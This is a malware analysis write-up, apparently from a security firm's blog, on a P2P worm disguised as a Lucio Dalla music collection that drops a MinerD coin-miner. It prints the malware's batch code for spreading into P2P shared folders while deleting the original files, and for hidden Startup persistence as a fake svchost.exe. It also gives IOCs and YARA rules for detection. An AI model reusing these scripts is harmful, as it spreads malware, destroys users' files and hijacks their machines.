Hamburger Menu Icon
Yoroi Background

P2P Worm Spreads Crypto-Miners in the Wild


In the past months we published a white paper exploring the risks that users can encounter when downloading materials from P2P sharing network, such as the Torrent one. We discussed how crooks easily lure their victims to download malware along with the desired content. Recently, our threat monitoring operations pointed us to an interesting file named “Lucio Dalla Discografia Completa”: this file pretends to be  a collection of the discography of a  famous italian singer, but it actually hides malicious intents. 

For this reason, Cybaze-Yoroi ZLAB dissected this malware threat revealing its hidden virulent nature. 

Technical Analysis 

As anticipated, the file downloaded from the BitTorrent network is an executable. A quick recon revealed it actually is an SFX archive containing several other files. 

Brief DescriptionCoin-miner dropper (SFX archive)

Table 1: Static Information about the miner dropper

The usage of archive like SFX allows the attacker to hide the content of the malicious PE and significantly reduce the detection rate. Opening the sample with a common archive manager like WinRAR or 7z, unveil its content. 

Figure 1: Content of the SFX file

The archive contains more than a dozen of files. In detail it embeds:

  • 16 temporary files used during execution;
  • a Visual Basic Script;
  • a batch script;
  • and a setup file

On the right of Figure 1 it is possible to see the SFX configuration file. After the auto-extraction, the first file run is “run.vbs”. Its content is minimal and quickly redirect the execution to a small batch file, “installer.bat” contained in the same folder. Then it runs installer.bat (the filename) with the parameter "0" (WindowStyle hidden, to avoid hidden windows because it may trigger AntiViruses heuristics) and "true" (WaitOnReturn).

The content of “installer.bat” file is also minimal and points to a more complex text file "007.tmp", later renamed as "007.bat". That file weighs over 59 KB and contains more interesting functionalities.

Unlike the previous script, the “007” file performs many operations. The first one is to copy of all files contained in the extraction path directory into “#” subdirectory and to rename some of the just extracted files, suggesting some of the files are dependencies of a more complex chain.

@echo off & setlocal enabledelayedexpansion

set CURRDIR=%~dp0
md #
copy "%CURRDIR%/002.tmp" "%CURRDIR%/#/002.tmp"
copy "%CURRDIR%/003.tmp" "%CURRDIR%/#/003.tmp"
copy "%CURRDIR%/004.tmp" "%CURRDIR%/#/004.tmp"
copy "%CURRDIR%/005.tmp" "%CURRDIR%/#/005.tmp"
copy "%CURRDIR%/006.tmp" "%CURRDIR%/#/006.tmp"
copy "%CURRDIR%/007.tmp" "%CURRDIR%/#/007.tmp"
copy "%CURRDIR%/008.tmp" "%CURRDIR%/#/008.tmp"
copy "%CURRDIR%/010.tmp" "%CURRDIR%/#/010.tmp"
copy "%CURRDIR%/011.tmp" "%CURRDIR%/#/011.tmp"
copy "%CURRDIR%/013.tmp" "%CURRDIR%/#/013.tmp"
copy "%CURRDIR%/014.tmp" "%CURRDIR%/#/014.tmp"
copy "%CURRDIR%/016.tmp" "%CURRDIR%/#/016.tmp"
copy "%CURRDIR%/installer.bat" "%CURRDIR%/#/installer.bat"
copy "%CURRDIR%/run.vbs" "%CURRDIR%/#/run.vbs"
copy "%CURRDIR%/002.tmp" "%CURRDIR%/7z.exe"
copy "%CURRDIR%/003.tmp" "%CURRDIR%/7z.dll"
copy "%CURRDIR%/004.tmp" "%CURRDIR%/Default.SFX"
copy "%CURRDIR%/005.tmp" "%CURRDIR%/Rar.exe"
copy "%CURRDIR%/006.tmp" "%CURRDIR%/sfx.conf

Code Snippet 1: Copy of the files in a subfolder

After that, it generates three different files named “001.tmp”, “32.tmp” and “64.tmp”, later renamed with “.exe” suffix. They are created by mixing up the original files. In particular: “001.tmp” is created combining file “008.tmp”, “009.tmp” and “010.tmp”. The resulting executable have been split in those files, evading AV signatures. 

But this composed executable hides another interesting detail. Before merging the file slices, the script replaces part of the PE header: it overrides the “This program cannot be run in DOS mode” string with random chars, generating different files hashes at every infection. This polymorphic techniques implemented directly in bash stage is applied to all the other files chunked and embedded into the original SFX archive.

Figure 2: Generation of the custom DOS header

After that, the script tries to use the just created “Rar.exe” and “7z.exe” files to create new SFX file in other directories belonging to the P2P platforms. This trick is used to spread the attack across the file-sharing communities, to compromise much more victims and to keep the infection alive. An example of this routine is the following:

for /d /r "c:\" %%a in (preferences.ini) do (
if exist "%%a" (
for /f %%b in ('findstr /c:"IncomingDir=" "%%a"') do (
set "var=%%b"
for %%c in ("!var:~12!\*.*") do (
ECHO ERRO %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% > "%CURRDIR%#\setup"
rar a -r -sfx -m5 -ep1 -zsfx.conf "%%~nc".exe #\*
7z a -tzip -mx=0 "%%~nc".zip "%%~nc".exe
del "%%~nc".exe
del "%%c"
move "%%~nc.zip" "!var:~12!\"   ))))


for /d /r "c:\" %%a in (*) do (
if /i "%%~nxa"=="my grokster" (
set "var=%%a" (
for %%c in ("!var!\*.*") do (
ECHO ERRO %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% > "%CURRDIR%#\setup"
rar a -r -sfx -m5 -ep1 -zsfx.conf "%%~nc".exe #\*
7z a -tzip -mx=0 "%%~nc".zip "%%~nc".exe
del "%%~nc".exe
del "%%c"
move "%%~nc.zip" "!var!\"   ))))

Code Snippet 2: Example of propagation routine

All these actions are performed for each system drive letter, such as C:, D:, X: and so on. After that, the script looks for the Microsoft Windows OS version from “5.x” to “15.x” and finally executes several specific routines according to the target machine. These routines perform a few basic operations:

  1. Create a new directory in “%systemdrive\AppCache\x86%” and immediately hide it; 
  2. Copy the file “001.tmp” in the Startup Folder (for every OS language) renaming it as “svchost.exe” and the file 32/64.tmp in “AppCache\x86\”;
  3. Execute “001.exe” file. 
if defined PROGRAMFILES(X86) (goto x64) else (goto x86)

mkdir %systemdrive%\AppCache\x86
attrib +s +h %systemdrive%\AppCache\x86
attrib +s +h %systemdrive%\AppCache
copy /y "%CURRDIR%\001.tmp" "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
copy /y "%CURRDIR%\001.tmp" "%systemdrive%\users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe"
copy /y "%CURRDIR%\64.tmp" "%systemdrive%\AppCache\x86\svchost.exe"
attrib +h "%systemdrive%\AppCache\x86\svchost.exe"
"%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
"%systemdrive%\users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe"
goto end

Code Snippet 3: Choose of the files to copy whether the target architecture is x86 or x64

At this point, the malicious control passes to the 001.exe file located in the Startup folder.

Figure 3: UPX signature evidence

The 001 File

The 001.exe is actually packed with a known version of the UPX compressor. So, the extraction of the payload is quite straight forward.

ThreatMiner Launcher
Brief DescriptionCoin-miner Payload (001.exe) packed with UPX

Table 2: Generic info about the Miner Loader

ThreatMiner Launcher Decompressed
Brief DescriptionCoin-miner Payload (001.exe) unpacked

Table 3: Generic info about the Miner Loader unpacked

Analyzing the decompressed binary, we noticed the malware firstly tries to run the “svchost.exe” binary contained in “%systemdrive%\AppCache\x86”, which likely is the real payload.

Figure 4: Evicends of the mining routine

The Payload

Brief DescriptionCoin-miner Payload (32.exe) packed with UPX (minerd)

Table 4: Generic Information of the Coininer compiled in 32 bit (UPX packed)

Brief DescriptionCoin-miner Payload (64.exe) packed with UPX (minerd)

Table 5: Generic Information of the Coininer compiled in 32 bit (UPX unpacked)

The “svchost.exe” placed in the file “%systemdrive%\AppCache\x86” folder actually is one of the two files “32.exe” and “64.exe” previously created.  After unpacking routines, the results are the following.

Brief DescriptionCoin-miner Payload (32.exe) unpacked (minerd)

Table 6: Generic Information of the Coininer compiled in 64 bit (UPX packed)

Brief DescriptionCoin-miner Payload (64.exe) unpacked(minerd)

Table 7: Generic Information of the Coininer compiled in 64 bit (UPX packed)

Obviously, these hashes changes at every infection due to the polymorphic technique implemented in the bash stage previously described. The unique purpose of “001.exe” is the execution of “32.exe” or “64.exe” contained in “%systemdrive%\AppCache\x86”, a stratum-based coinminer. Stratum is the de-facto standard protocol used by crypto-miners to connect to mining pools. 

Figure 5: Connection routine to the mining server

Exploring the sample we notice that it actually is “MinerD”, an open-source cryptomining software publicly available on GitHub

Figure 6: Comparison between the payloads (on the left) and the GitHub project (on the right)


This malware threat reminds us of the hidden risks of downloading material through p2p networks, along with the tricks adopted by the crooks to keep the campaign running in the wild. Indeed, this sample is able to survive across multiple p2p network by propagating to p2p shared folders configured into the victim machine, ensuring a good level of resilience from the attacker point of view.  Also, the attackers implemented polymorphic trick directly in batch language, replacing of part of the PE file header to create unique samples on each infection .

A naive or a distracted user can be lured to download infected media contents with the promise to ear his favorite musician, but this action can be compromise the machine of the victim and feed the cyber-criminals behind this campaign. This time, the consequences of such lack of awareness are quite contained, the final payload is actually a crypto-miner and the user may only experience delays or crashes, but what if the payload contains a bot a RAT, or even a ransomware? The consequences could be decisely more serious.

Indicators of Compromise


  • f9b2e61200addf760d7bd157c73201e97257b12d5177837a1bffb98f4064e76a
  • b6080b2786d2e4ac30207fb2f177046cfd40fa6578c56f3dfd13abab7d62e2ea
  • 7bd25bd3c0f003ffea67c846b4fefd8fb8b4f72d836544d0ef786c5c6c63b422
  • 73bc41504045e4e6de1b63ec40433afabf316141b1289c69905ee946e1b1a263
  • a3574e73234e18be8d233c9e3fa3819600fc40341d8be8fc4449e4e73632ad6d
  • 746d17e8d0b961f0c7733f155152fa54d2610fc6d117217d24f32d3ad370075e
  • 552a4cbd2628d16d1fc910c9fc24bc426cafdf0f755f7b4013484adbc0393ca7

Mining Pool  (Coin-Miner): 

  • tcp://xcnpool[.1gh[.com

Yara Rules

rule LucioDalla_CoinMiner_SFX_201907 {
   	 description = "Yara Rule for SFX file of Lucio Dalla CoinMiner"
   	 author = "ZLAB Yoroi - Cybaze"
   	 last_updated = "2019-07-12"
   	 tlp = "white"
   	 category = "informational"

      $s1 = "SFX module - Copyright (c) 2005-2012 Oleg Scherbakov"
      $s2 = "7-Zip archiver - Copyright (c) 1999-2011 Igor Pavlov" 
      $s3 = "7-Zip - Copyright (c) 1999-2011 " ascii
      $s4 = "sfxelevation" ascii wide
      $h1 = { 30 ?? ?? 2E 74 6D 70 } 
      $setup = "setup" wide ascii 

      any of ($s*) and $setup and (#h1 > 8)

rule LucioDalla_001_UPX_201907 {
		description = "Yara Rule for 001 UPX file file of Lucio Dalla CoinMiner"
		author = "ZLAB Yoroi - Cybaze"
		last_updated = "2019-07-12"
		tlp = "white"
		category = "informational"

		$s1 = "UPX" 
		$h1 = { CB 40 5A 3E 2A E5 A2 C3 } 
		$h2 = { 38 D5 CD 57 3F E4 BF 45 }
		$h3 = { 21 54 68 69 73 20 ?? ?? ?? ?? ?? ?? ?? 20 63 61 6E 6E 6F 74 20 62 65 20 72 75 }

		all of them

rule LucioDalla_001_Unpacked_201907 {
		description = "Yara Rule for 001 unpacked file file of Lucio Dalla CoinMiner"
		author = "ZLAB Yoroi - Cybaze"
		last_updated = "2019-07-12"
		tlp = "white"
		category = "informational"

		$s1 = "zPLR" 
		$s2 = "\\AppCache\\x86\\svchost.exe"
		$h1 = { 24 E8 5A CF FF FF 83 EC 04 } 
		$h2 = { 21 54 68 69 73 20 ?? ?? ?? ?? ?? ?? ?? 20 63 61 6E 6E 6F 74 20 62 65 20 72 75 }

		all of them

rule LucioDalla_Miner_Workers_201907 {
		description = "Yara Rule for all CoinMiner Workers"
		author = "ZLAB Yoroi - Cybaze"
		last_updated = "2019-07-12"
		tlp = "white"
		category = "informational"

		$upx = "UPX"
		$hpa32 = { 42 DA 92 BF 2D BB F0 B0 } 
		$hpb32 = { 2F 4D 7B 8C 83 FB 03 FF C2 }
		$hp64a = { B0 29 74 3A 48 55 04 6C 30 }
		$hp64b = { 11 60 6C A4 E9 FA 71 BE 47 }
		$s1 = "blowfish.c"
		$s2 = "mpih-rshift-asm"
		$s3 = { D0 67 EC 67 B6 67 AF 67 F5 }

		($upx and 2 of ($hp*)) or (all of ($s*))

This blog post was authored by Luigi Martire, Davide Testa and Luca Mella of Cybaze-Yoroi Z-LAB

linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram